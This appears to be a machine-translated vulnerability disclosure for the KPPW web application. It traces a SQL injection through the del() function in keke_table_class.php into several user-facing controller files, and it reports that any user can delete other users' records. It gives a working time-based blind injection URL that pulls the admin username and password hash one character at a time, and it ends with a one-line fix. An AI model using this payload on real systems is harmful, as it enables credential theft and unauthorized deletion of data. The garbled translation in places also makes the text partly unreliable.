KPPW Latest Version SQL injection vulnerability 4 (multiple injection and unauthorized analysis due to the same problem)

KPPW Latest Version SQL injection vulnerability 4 (multiple injection and unauthorized analysis due to the same problem)

KPPW latest SQL injection vulnerability 4 (multiple injection and unauthorized injection due to the same problem)

File/control/user/account_report.php

$ ObjReportT = keke_table_class: get_instance ('witkey _ Report'); if (isset ($ action) {switch ($ action) {case 'mulitdel ': if ($ ckb) {$ objTaskT-> del ('Task _ id', $ ckb); kekezu: show_msg ('deleted successfully', $ strUrl, NULL, NULL, 'OK ');} else {kekezu: show_msg ('deletion failed', NULL, 'error');} break;

In $ objTaskT-> del ('Task _ id', $ ckb);, $ ckb enters the del Function

Follow del function, file/lib/inc/keke_table_class.php

function del($pk, $val, $url = null) {if (! $val) {return false;}if (is_array ( $val ) && ! empty ( $val )) {$ids = implode ( ',', $val );$this->_table_obj->setWhere ( " $pk in ($ids)" );} elseif ($val) {$this->_table_obj->setWhere ( "$pk = " . $val );}$del_query = "del_" . $this->_pre . $this->_table_name;return $this->_table_obj->$del_query ();}

We can see that the val is both a ckb variable.

When val is not empty and it is not a number, it directly enters the where Condition Statement. Do not use quotation marks to protect it, resulting in SQL injection.

Here is a bug: The del function is a function in the/lib/inc/keke_table_class.php file, but here the/lib/inc/keke_table_class.php file is instantiated as: $ objReportT = keke_table_class :: get_instance ('witkey _ Report'); while $ objTaskT has no initialization object, so the del function cannot be triggered.

There is also an issue of consent in the file/control/user/account_rights.php



Because the del function here is a global function in the file/lib/inc/keke_table_class.php.

Called in many places:
 

The background trigger does not work here (it is said that the vulnerability of the day after tomorrow is really nobody cares ...)

There are more than 20 triggers and files at the front-end.

Partially filtered

There are more to start.

/control/user/message_detail.php/control/user/message_notice.php/control/user/message_private.php/control/user/shop_caselist.php/control/user/transaction_released.php/control/user/transaction_service.php

Here/control/user/transaction_service.php is used as an example:

$ StrModelName = $ kekezu-> _ model_list [$ intModelId] ['model _ Code']; $ arrStatus = call_user_func (array ($ strModelName. '_ shop_class', 'Get _'. $ strModelName. '_ status'); $ objServiceT = keke_table_class: get_instance ('witkey _ Service'); if (isset ($ action) {switch ($ action) {case 'mulitdel ': if ($ ckb) {$ objServiceT-> del ('service _ id', $ ckb); kekezu: show_msg ('deleted successfully ', $ strUrl, NULL, NULL, 'OK');} else {kekezu: show_msg ('deletion failed', NULL, 'error');} break;

Agree to inject



In phase II, when deleting various types of data, the data is only deleted based on the id, and user attributes are not determined, resulting in unauthorized operations.

Delete content under any user permission

Here, you can delete all modules and data created by the Administrator.

SQL Injection:

http://localhost/KPPW2520141118UTF-8/index.php?do=user&view=transaction&op=service&action=mulitDel&ckb=1161 and 1=if(mid((select concat(username,password) from keke_witkey_member limit 0,1),1,1)=char(97),sleep(5),2)

Check the SQL Execution result:
 

This will be returned after a delay of 5 seconds
 

The first character of UserName + password is.

The cbk here is the service_id of the service module.

Cbk = 1161 is a module created by the admin user. It can also be deleted, resulting in unauthorized operations.

Solution:

Use intval or single quotation marks for protection.